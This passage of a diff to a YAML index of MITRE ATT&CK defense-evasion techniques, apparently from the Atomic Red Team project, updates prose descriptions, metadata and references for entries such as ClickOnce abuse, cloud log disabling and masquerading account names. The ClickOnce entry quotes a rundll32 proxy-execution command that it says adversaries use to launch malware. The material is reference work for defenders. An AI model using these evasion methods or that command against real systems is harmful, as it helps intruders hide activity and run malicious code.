+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       type: attack-pattern
@@ -13176,18 +13309,30 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.005:
     technique:
-      modified: '2023-10-02T22:17:54.968Z'
+      modified: '2024-09-25T14:15:26.322Z'
       name: Modify Cloud Compute Configurations
-      description: |-
-        Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.
-
-        For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking 2023) Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.(Citation: Microsoft Azure Policy)
-
-        Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.(Citation: Microsoft Peach Sandstorm 2023) This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.(Citation: Microsoft Azure Policy) (Citation: Microsoft Subscription Hijacking 2022)
+      description: "Adversaries may modify settings that directly affect the size,
+        locations, and resources available to cloud compute infrastructure in order
+        to evade defenses. These settings may include service quotas, subscription
+        associations, tenant-wide policies, or other configurations that impact available
+        compute. Such modifications may allow adversaries to abuse the victim’s compute
+        resources to achieve their goals, potentially without affecting the execution
+        of running instances and/or revealing their activities to the victim.\n\nFor
+        example, cloud providers often limit customer usage of compute resources via
+        quotas. Customers may request adjustments to these quotas to support increased
+        computing needs, though these adjustments may require approval from the cloud
+        provider. Adversaries who compromise a cloud environment may similarly request
+        quota adjustments in order to support their activities, such as enabling additional
+        [Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
+        suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
+        2023) Adversaries may also increase allowed resource usage by modifying any
+        tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
+        Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
+        where cloud resources can be deployed, such as enabling [Unused/Unsupported
+        Cloud Regions](https://attack.mitre.org/techniques/T1535). "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -13201,7 +13346,7 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      x_mitre_version: '1.0'
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       type: attack-pattern
@@ -13213,20 +13358,11 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1578/005
         external_id: T1578.005
-      - source_name: Microsoft Subscription Hijacking 2022
-        description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
-          using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
-        url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
       - source_name: Microsoft Cryptojacking 2023
         description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
           Understanding and defending against cloud compute resource abuse. Retrieved
           September 5, 2023.'
         url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
-      - source_name: Microsoft Peach Sandstorm 2023
-        description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
-          password spray campaigns enable intelligence collection at high-value targets.
-          Retrieved September 18, 2023.
-        url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
       - source_name: Microsoft Azure Policy
         description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
           Retrieved September 5, 2023.
@@ -13235,11 +13371,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.008:
     technique:
-      modified: '2024-04-12T21:13:56.431Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Impair Defenses: Disable Cloud Logs'
       description: |-
         An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
@@ -13248,6 +13383,7 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -13257,6 +13393,7 @@ defense-evasion:
       - Janantha Marasinghe
       - Matt Snyder, VMware
       - Joe Gumke, U.S. Bank
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: 'Monitor logs for API calls to disable logging. In AWS, monitor
         for: <code>StopLogging</code> and <code>DeleteTrail</code>.(Citation: Stopping
@@ -13268,13 +13405,13 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Azure AD
-      - Office 365
-      x_mitre_version: '2.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Cloud Service: Cloud Service Modification'
       - 'User Account: User Account Modification'
@@ -13319,9 +13456,6 @@ defense-evasion:
         url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.008
     atomic_tests:
     - name: AWS - Disable CloudTrail Logging Through Event Selectors using Stratus
@@ -13596,18 +13730,140 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1564.003
     atomic_tests: []
+  T1127.002:
+    technique:
+      modified: '2024-10-17T18:50:41.474Z'
+      name: ClickOnce
+      description: |-
+        Adversaries may use ClickOnce applications (.appref-ms and .application files) to proxy execution of code through a trusted Windows utility.(Citation: Burke/CISA ClickOnce BlackHat) ClickOnce is a deployment that enables a user to create self-updating Windows-based .NET applications (i.e, .XBAP, .EXE, or .DLL) that install and run from a file share or web page with minimal user interaction. The application launches as a child process of DFSVC.EXE, which is responsible for installing, launching, and updating the application.(Citation: SpectorOps Medium ClickOnce)
+
+        Because ClickOnce applications receive only limited permissions, they do not require administrative permissions to install.(Citation: Microsoft Learn ClickOnce) As such, adversaries may abuse ClickOnce to proxy execution of malicious code without needing to escalate privileges.
+
+        ClickOnce may be abused in a number of ways. For example, an adversary may rely on [User Execution](https://attack.mitre.org/techniques/T1204). When a user visits a malicious website, the .NET malware is disguised as legitimate software and a ClickOnce popup is displayed for installation.(Citation: NetSPI ClickOnce)
+
+        Adversaries may also abuse ClickOnce to execute malware via a [Rundll32](https://attack.mitre.org/techniques/T1218/011) script using the command `rundll32.exe dfshim.dll,ShOpenVerbApplication1`.(Citation: LOLBAS /Dfsvc.exe)
+
+        Additionally, an adversary can move the ClickOnce application file to a remote user’s startup folder for continued malicious code deployment (i.e., [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001)).(Citation: Burke/CISA ClickOnce BlackHat)(Citation: Burke/CISA ClickOnce Paper)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Wirapong Petshagun
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'Command: Command Execution'
+      - 'Process: Process Metadata'
+      - 'Module: Module Load'
+      x_mitre_system_requirements:
+      - ".NET Framework"
+      type: attack-pattern
+      id: attack-pattern--cc279e50-df85-4c8e-be80-6dc2eda8849c
+      created: '2024-09-09T14:39:28.637Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1127/002
+        external_id: T1127.002
+      - source_name: LOLBAS /Dfsvc.exe
+        description: LOLBAS. (n.d.). /Dfsvc.exe. Retrieved September 9, 2024.
+        url: https://lolbas-project.github.io/lolbas/Binaries/Dfsvc/
+      - source_name: Microsoft Learn ClickOnce
+        description: Microsoft. (2023, September 14). ClickOnce security and deployment.
+          Retrieved September 9, 2024.
+        url: https://learn.microsoft.com/en-us/visualstudio/deployment/clickonce-security-and-deployment?view=vs-2022
+      - source_name: SpectorOps Medium ClickOnce
+        description: 'Nick Powers. (2023, June 7). Less SmartScreen More Caffeine:
+          (Ab)Using ClickOnce for Trusted Code Execution. Retrieved September 9, 2024.'
+        url: https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5
+      - source_name: NetSPI ClickOnce
+        description: Ryan Gandrud. (2015, March 23). All You Need Is One – A ClickOnce
+          Love Story. Retrieved September 9, 2024.
+        url: https://www.netspi.com/blog/technical-blog/adversary-simulation/all-you-need-is-one-a-clickonce-love-story/
+      - source_name: Burke/CISA ClickOnce Paper
+        description: William J. Burke IV. (n.d.). Appref-ms Abuse for  Code Execution
+          & C2. Retrieved September 9, 2024.
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended-wp.pdf?_gl=1*1jv89bf*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.256219723.1512103758.1724809895-1999078900.1724809894
+      - source_name: Burke/CISA ClickOnce BlackHat
+        description: 'William Joseph Burke III. (2019, August 7). CLICKONCE AND YOU’RE
+          IN: When .appref-ms abuse is operating as intended. Retrieved September
+          9, 2024.'
+        url: https://i.blackhat.com/USA-19/Wednesday/us-19-Burke-ClickOnce-And-Youre-In-When-Appref-Ms-Abuse-Is-Operating-As-Intended.pdf?_gl=1*16njas6*_gcl_au*NjAyMzkzMjc3LjE3MjQ4MDk4OTQ.*_ga*MTk5OTA3ODkwMC4xNzI0ODA5ODk0*_ga_K4JK67TFYV*MTcyNDgwOTg5NC4xLjEuMTcyNDgwOTk1Ny4wLjAuMA..&_ga=2.253743689.1512103758.1724809895-1999078900.1724809894
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1070.010:
+    technique:
+      modified: '2024-10-13T15:48:46.391Z'
+      name: Relocate Malware
+      description: |-
+        Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with [File Deletion](https://attack.mitre.org/techniques/T1070/004) to cleanup older artifacts.
+
+        Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005)).(Citation: DFIR Report Trickbot June 2023) Payloads may also be repositioned to target [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012) as well as specific locations associated with establishing [Persistence](https://attack.mitre.org/tactics/TA0003).(Citation: Latrodectus APR 2024)
+
+        Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as [User Execution](https://attack.mitre.org/techniques/T1204) and [Phishing](https://attack.mitre.org/techniques/T1566)) that may have generated alerts or otherwise drawn attention from defenders.
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Matt Anderson, @‌nosecurething, Huntress
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--cc36eeae-2209-4e63-89d3-c97e19edf280
+      created: '2024-05-31T11:07:57.406Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/010
+        external_id: T1070.010
+      - source_name: Latrodectus APR 2024
+        description: 'Proofpoint Threat Research and Team Cymru S2 Threat Research.
+          (2024, April 4). Latrodectus: This Spider Bytes Like Ice . Retrieved May
+          31, 2024.'
+        url: https://www.proofpoint.com/us/blog/threat-insight/latrodectus-spider-bytes-ice
+      - source_name: DFIR Report Trickbot June 2023
+        description: The DFIR Report. (2023, June 12). A Truly Graceful Wipe Out.
+          Retrieved May 31, 2024.
+        url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1556.009:
     technique:
-      modified: '2024-04-18T20:53:46.175Z'
+      modified: '2024-09-16T16:54:47.595Z'
       name: Conditional Access Policies
       description: "Adversaries may disable or modify conditional access policies
         to enable persistent access to compromised accounts. Conditional access policies
         are additional verifications used by identity providers and identity and access
         management systems to determine whether a user should be granted access to
-        a resource.\n\nFor example, in Azure AD, Okta, and JumpCloud, users can be
+        a resource.\n\nFor example, in Entra ID, Okta, and JumpCloud, users can be
         denied access to applications based on their IP address, device enrollment
         status, and use of multi-factor authentication.(Citation: Microsoft Conditional
         Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional
@@ -13640,10 +13896,9 @@ defense-evasion:
       - enterprise-attack
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
-      - Azure AD
-      - SaaS
       - IaaS
-      x_mitre_version: '1.0'
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'Cloud Service: Cloud Service Modification'
@@ -13680,40 +13935,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1578.002:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
-      type: attack-pattern
-      created: '2020-05-14T14:45:15.978Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.002
-        url: https://attack.mitre.org/techniques/T1578/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.416Z'
       name: Create Cloud Instance
       description: |-
         An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://attack.mitre.org/techniques/T1005) or for [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends 2020)
@@ -13722,20 +13947,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The creation of a new instance or VM is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, the creation of an instance by a new user account or the unexpected creation of one or more snapshots followed by the creation of an instance may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the creation of an instance in the <code>RunInstances</code> event, and in Azure the creation of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances create</code> to create a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Creation'
       - 'Instance: Instance Metadata'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--cf1c2504-433f-4c4e-a1f8-91de45a0318c
+      created: '2020-05-14T14:45:15.978Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/002
+        external_id: T1578.002
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
+        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
+          2020.
+        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1055.009:
     technique:
@@ -13765,7 +14020,7 @@ defense-evasion:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -13808,8 +14063,6 @@ defense-evasion:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1601.001:
     technique:
@@ -13856,7 +14109,7 @@ defense-evasion:
         url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
         description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
           IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T17:50:46.560Z'
       name: Patch System Image
       description: "Adversaries may modify the operating system of a network device
         to introduce new capabilities or weaken existing defenses.(Citation: Killing
@@ -13922,12 +14175,10 @@ defense-evasion:
       - 'File: File Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1070.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T22:30:01.227Z'
       name: Clear Persistence
       description: |-
         Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) Adversaries may also delete accounts previously created to maintain persistence (i.e. [Create Account](https://attack.mitre.org/techniques/T1136)).(Citation: Talos - Cisco Attack 2022)
@@ -13982,33 +14233,84 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
-  T1556.001:
-    technique:
-      x_mitre_platforms:
-      - Windows
+  T1036.010:
+    technique:
+      modified: '2024-10-17T15:20:36.705Z'
+      name: Masquerade Account Name
+      description: "Adversaries may match or approximate the names of legitimate accounts
+        to make newly created ones appear benign. This will typically occur during
+        [Create Account](https://attack.mitre.org/techniques/T1136), although accounts
+        may also be renamed at a later date. This may also coincide with [Account
+        Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first
+        deletes an account before re-creating one with the same name.(Citation: Huntress
+        MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts,
+        such as those associated with legitimate software, data backups, or container
+        cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec
+        Kubernetes Attack 2023) They may also give accounts generic, trustworthy names,
+        such as “admin”, “help”, or “root.”(Citation: Invictus IR Cloud Ransomware
+        2024) Sometimes adversaries may model account names off of those already existing
+        in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).
+        \ \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1656),
+        which describes impersonating specific trusted individuals or organizations,
+        rather than user or service account names.  "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Menachem Goldstein
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      - SaaS
+      - IaaS
+      - Containers
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'User Account: User Account Creation'
       type: attack-pattern
-      created: '2020-02-11T19:05:02.399Z'
+      id: attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0
+      created: '2024-08-05T21:39:16.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1556.001
-        url: https://attack.mitre.org/techniques/T1556/001
-      - source_name: Dell Skeleton
-        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
-          Retrieved April 8, 2019.
-        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
-      - url: https://technet.microsoft.com/en-us/library/dn487457.aspx
-        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
-          June 3, 2016.
-        source_name: TechNet Audit Policy
-      modified: '2022-04-25T14:00:00.188Z'
+        url: https://attack.mitre.org/techniques/T1036/010
+        external_id: T1036.010
+      - source_name: Elastic CUBA Ransomware 2022
+        description: Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew
+          Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved
+          August 5, 2024.
+        url: https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis
+      - source_name: Invictus IR Cloud Ransomware 2024
+        description: Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved
+          August 5, 2024.
+        url: https://www.invictus-ir.com/news/ransomware-in-the-cloud
+      - source_name: Huntress MOVEit 2023
+        description: John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability
+          CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.
+        url: https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response
+      - source_name: Aquasec Kubernetes Attack 2023
+        description: Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever
+          Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14,
+          2023.
+        url: https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
+  T1556.001:
+    technique:
+      modified: '2024-08-21T15:26:54.386Z'
       name: Domain Controller Authentication
       description: "Adversaries may patch the authentication process on a domain controller
         to bypass the typical authentication mechanisms and enable access to accounts.
@@ -14029,6 +14331,7 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for calls to <code>OpenProcess</code> that can be
         used to manipulate lsass.exe running on a domain controller as well as for
         malicious modifications to functions exported from authentication-related
@@ -14043,22 +14346,42 @@ defense-evasion:
         used to execute binaries on a remote system as a particular account. Correlate
         other security systems with login information (e.g. a user has an active login
         session but has not entered the building or does not have VPN access). "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '2.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Process: Process Access'
       - 'File: File Modification'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--d4b96d2c-1032-4b22-9235-2b5b649d0605
+      created: '2020-02-11T19:05:02.399Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1556/001
+        external_id: T1556.001
+      - source_name: Dell Skeleton
+        description: Dell SecureWorks. (2015, January 12). Skeleton Key Malware Analysis.
+          Retrieved April 8, 2019.
+        url: https://www.secureworks.com/research/skeleton-key-malware-analysis
+      - source_name: TechNet Audit Policy
+        description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved
+          June 3, 2016.
+        url: https://technet.microsoft.com/en-us/library/dn487457.aspx
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1027.006:
     technique:
-      modified: '2023-07-14T14:01:41.475Z'
+      modified: '2024-09-12T19:12:13.006Z'
       name: HTML Smuggling
       description: |-
